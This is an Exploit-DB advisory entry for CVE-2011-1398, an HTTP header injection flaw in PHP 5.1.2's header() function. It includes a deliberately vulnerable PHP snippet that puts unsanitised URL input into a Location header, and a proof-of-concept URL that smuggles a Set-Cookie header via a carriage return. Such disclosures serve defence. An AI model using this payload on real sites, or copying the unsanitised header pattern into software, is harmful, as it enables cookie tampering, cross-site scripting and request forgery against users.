PHP 'header' HTTP Header Injection Vulnerability

2011-10-06T00:00:00
ID EDB-ID:37688
Type exploitdb
Reporter Mr. Tokumaru
Modified 2011-10-06T00:00:00

Description

PHP 'header()' HTTP Header Injection Vulnerability. CVE-2011-1398. Remote exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/55297/info

PHP is prone to a vulnerability that allows attackers to inject arbitrary headers through a URL.

By inserting arbitrary headers, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTML-injection, and other attacks.

PHP 5.1.2 is vulnerable; other versions may also be affected. 

<?php
header('Location: '.$_GET['url']);
print_r($_COOKIE);
?>

http://www.example.com/head1.php?url=http://example.com/head1.php%0DSet-Cookie:+NAME=foo